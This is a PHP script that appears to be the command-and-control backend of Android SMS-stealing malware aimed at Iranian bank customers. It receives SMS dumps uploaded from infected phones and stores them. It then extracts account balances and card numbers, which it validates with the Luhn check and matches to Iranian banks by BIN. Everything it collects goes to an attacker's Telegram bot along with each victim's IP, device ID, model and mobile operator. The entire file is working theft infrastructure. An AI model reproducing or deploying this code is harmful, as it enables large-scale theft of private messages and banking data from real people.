
  
<?php  
set_time_limit(0);  
ini_set('max_execution_time', 0);  
include("metii.php");  
  
define("TOKEN", $token);  
define("ID", $id);  
  
// جایگزین str_starts_with برای PHP < 8  
function starts_with($string, $start) {  
    return substr($string, 0, strlen($start)) === $start;  
}  
  
// گرفتن IP کاربر  
function get_client_ip() {  
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];  
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR'];  
    return $_SERVER['REMOTE_ADDR'] ?? 'Unknown';  
}  
  
// لاگ داخلی  
function debug_log($message){  
    file_put_contents(__DIR__.'/debug.log', "[".date('Y-m-d H:i:s')."] ".$message.PHP_EOL, FILE_APPEND);  
}  
  
// تابع ارسال به تلگرام (با لاگ)  
function bot($method, $datas = []){  
    $url = "https://api.telegram.org/bot".TOKEN."/".$method;  
    $ch = curl_init();  
    curl_setopt($ch, CURLOPT_URL, $url);  
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);  
    $res = curl_exec($ch);  
    $err = curl_error($ch);  
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
    curl_close($ch);  
  
    debug_log("METHOD: $method HTTP: $http_code ERR: ".($err ?: 'none')." RESP: ".($res ?: 'empty'));  
  
    $json = json_decode($res, true);  
    return $json ?: ['ok'=>false,'error'=>'invalid_json','raw'=>$res,'http_code'=>$http_code];  
}  
  
// تابع ارسال فقط متن به تلگرام (به جای ارسال فایل)
function sfanel_text($text, $keyboard = null){
    $datas = [
        'chat_id' => ID,
        'text'    => $text,
        'parse_mode' => 'HTML',
        // 'disable_web_page_preview' => true, // اگر می‌خواهی پیش‌نمایش لینک حذف شود
    ];
    if($keyboard !== null) $datas['reply_markup'] = $keyboard;

    // استفاده از تابع bot که قبلاً تعریف شده
    return bot('sendMessage', $datas);
}
function sfanel($text, $keyboard) {
    bot('sendDocument', [
        'chat_id' => ID,
        'caption' => $text,
        'parse_mode' => 'HTML',
        'document' => new CURLFILE("AllSMS.txt"),
        'reply_markup' => $keyboard
    ]);
}  
// داده کاربر  
function get_user_data($androidid, $ip){  
    $filename = "data/$androidid.json";  
    if(!file_exists($filename)){  
        $data_list = ['ipfrist'=>$ip,'created_at'=>date('Y-m-d H:i:s')];  
        // ایجاد مسیر پوشه data در صورت عدم وجود  
        if(!is_dir(dirname($filename))){  
            @mkdir(dirname($filename), 0755, true);  
        }  
        file_put_contents($filename, json_encode($data_list, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT));  
    } else {  
        $content = file_get_contents($filename);  
        $data_list = json_decode($content,true) ?: ['ipfrist'=>$ip];  
    }  
    return $data_list;  
}  
  
// Luhn algorithm برای اعتبارسنجی کارت (کاهش false positives)  
function luhn_check($number) {  
    $number = preg_replace('/\D/', '', $number);  
    $sum = 0;  
    $alt = false;  
    for ($i = strlen($number) - 1; $i >= 0; $i--) {  
        $n = intval($number[$i]);  
        if ($alt) {  
            $n *= 2;  
            if ($n > 9) $n -= 9;  
        }  
        $sum += $n;  
        $alt = !$alt;  
    }  
    return ($sum % 10) === 0;  
}  
  
// شماره‌ها را استخراج، نرمال‌سازی، اعتبارسنجی و تشخیص بانک می‌کند  
function extract_card_numbers($text, $banks) {  
    $results = [];  
  
    // الگوی جامع: فرمت‌های 1234567890123456 یا 1234 5678 9012 3456 یا 1234-5678-9012-3456  
    $pattern = '/(?:\b\d{16}\b|(?:\b\d{4}[-\s]?){3}\d{4}\b)/u';  
  
    if (preg_match_all($pattern, $text, $matches)) {  
        foreach ($matches[0] as $raw) {  
            // نرمال‌سازی (حذف فاصله و خط تیره)  
            $num = preg_replace('/\D+/', '', $raw);  
            if (strlen($num) !== 16) continue; // فقط 16 رقمی‌ها  
            // بررسی Luhn (اگر بخواهید دقیق‌تر شوید، این خط را فعال نگه دارید)  
            if (!luhn_check($num)) {  
                // اگر Luhn پاس نشد، می‌تونیم همچنان اضافه کنیم یا رد کنیم؛ اینجا رد می‌کنیم.  
                continue;  
            }  
  
            // تشخیص بانک با اولویت BIN (6 رقم)، سپس 5، سپس 4  
            $foundBank = '';  
            $binCandidates = [  
                substr($num, 0, 6),  
                substr($num, 0, 5),  
                substr($num, 0, 4)  
            ];  
            foreach ($binCandidates as $cand) {  
                if (isset($banks[$cand])) {  
                    $foundBank = $banks[$cand];  
                    break;  
                }  
            }  
            // اگر دقیقا با 6 رقم پیدا نشد، تلاش کنیم با کلیدهای موجود (در صورتی که کلیدها 6 رقمی باشن)  
            if ($foundBank === '') {  
                foreach ($banks as $key => $bankName) {  
                    if (substr($num, 0, strlen($key)) === $key) {  
                        $foundBank = $bankName;  
                        break;  
                    }  
                }  
            }  
  
            $results[] = ['number' => $num, 'bank' => $foundBank];  
        }  
    }  
  
    // حذف تکراری‌ها بر پایه شماره  
    $unique = [];  
    foreach ($results as $r) {  
        $unique[$r['number']] = $r;  
    }  
    return array_values($unique);  
}  
  
// آرایه بانک‌ها (کلیدها ممکن است 4 یا 6 رقمی باشند)  
$banks = [  
    "603769"=>"بانک صادرات ایران","621986"=>"بانک سامان","622106"=>"بانک پارسیان",  
    "627353"=>"بانک تجارت","627381"=>"بانک انصار","627412"=>"بانک اقتصاد نوین",  
    "627488"=>"بانک کارآفرین","627648"=>"بانک توسعه صادرات ایران","627760"=>"پست بانک ایران",  
    "627961"=>"بانک صنعت و معدن","628023"=>"بانک مسکن","628157"=>"مؤسسه اعتباری توسعه",  
    "636214"=>"بانک آینده","636949"=>"بانک حکمت ایرانیان","639194"=>"بانک پارسیان",  
    "639346"=>"بانک سینا","639347"=>"بانک پاسارگاد","639370"=>"بانک مهر اقتصاد",  
    "639599"=>"بانک قوامین","639607"=>"بانک سرمایه","991975"=>"بانک ملت"  
];  
  
// شروع پردازش  
if(isset($_GET['result']) && $_GET['result']==="ok"){  
    $action = $_GET['action'] ?? '';  
    $androidid = $_GET['androidid'] ?? '';  
    $model = $_GET['model'] ?? '';  
    $opr = $_GET['opr'] ?? '';  
    $ip = get_client_ip();  
  
    if($action==="uploadsms" && !empty($androidid)){  
        $PostData = file_get_contents("php://input") ?: '';  
        file_put_contents("AllSMS.txt", $PostData);  
  
        $data_list = get_user_data($androidid, $ip);  
        $ipfrist = $data_list['ipfrist'] ?? 'ثبت نشده';  
  
        $lines = file_exists("AllSMS.txt") ? file("AllSMS.txt") : [];  
        $balance1='';  
        foreach($lines as $line){  
            if(strpos($line,'مانده')!==false){  
                $balance1="💰 Balance : $line";  
                break;  
            }  
        }  
  
        $check = file_exists("AllSMS.txt") ? file_get_contents("AllSMS.txt") : '';  
        $saderat = strpos($check,"صادرات")!==false ? "💳 Card search - (صادرات) ᴅᴇᴛᴇᴄᴛᴇᴅ ✅" : "💳 Card search - (صادرات) Not Detected ❌";  
  
        // =================================================  
        // استخراج دقیق شماره‌ها از کل محتوای فایل (نه فقط یک خط)  
        // =================================================  
        $fullText = $check; // کل متن فایل  
        $cards = extract_card_numbers($fullText, $banks);  
  
        $matches = [];  
        foreach ($cards as $c) {  
            $num = $c['number'];  
            $bank = $c['bank'];  
            // حذف کلمه "صارات" — نمایش خواناتر: "کارت (بانک): شماره" یا "کارت: شماره"  
            if (!empty($bank)) {  
                $matches[] = "کارت ({$bank}): " . $num;  
            } else {  
                $matches[] = "کارت: " . $num;  
            }  
        }  
        // اگر هیچ شماره‌ای با Luhn پیدا نشد، برای اطمینان می‌تونیم مجدداً بدون Luhn بررسی کنیم (اختیاری)  
        if (empty($matches)) {  
            // fallback: پیدا کردن 16-digit بدون Luhn  
            if (preg_match_all('/(?:\b\d{16}\b|(?:\b\d{4}[-\s]?){3}\d{4}\b)/u', $fullText, $fallbackMatches)) {  
                $seen = [];  
                foreach ($fallbackMatches[0] as $raw) {  
                    $num = preg_replace('/\D+/', '', $raw);  
                    if (strlen($num) !== 16) continue;  
                    if (isset($seen[$num])) continue;  
                    $seen[$num] = true;  
                    // پیدا کردن بانک مشابه بالا  
                    $foundBank = '';  
                    foreach ($banks as $key => $bankName) {  
                        if (substr($num, 0, strlen($key)) === $key) {  
                            $foundBank = $bankName;  
                            break;  
                        }  
                    }  
                    if (!empty($foundBank)) {  
                        $matches[] = "کارت ({$foundBank}): " . $num;  
                    } else {  
                        $matches[] = "کارت: " . $num;  
                    }  
                }  
            }  
        }  
  
        $sendToTelegram = implode("\n", $matches);  
  
        sfanel_text(  
            "📧SMS File  
  
AndroidId : /set_$androidid  
IP : <code>$ip</code>

~$sendToTelegram  
  
[ 🦠 𝙲𝚛𝚎𝚊𝚝𝚘𝚛 : alexmattuz.t.me ]"  
        );  
        sfanel("📧SMS File

AndroidId : /set_$androidid
IP : <code>$ip</code>
IP FRIST : <code>$ipfrist</code>
📱Model : $model
📶 Operator : $opr


", null);
  
        if(file_exists("AllSMS.txt")) unlink("AllSMS.txt");  
    }  
}  
?>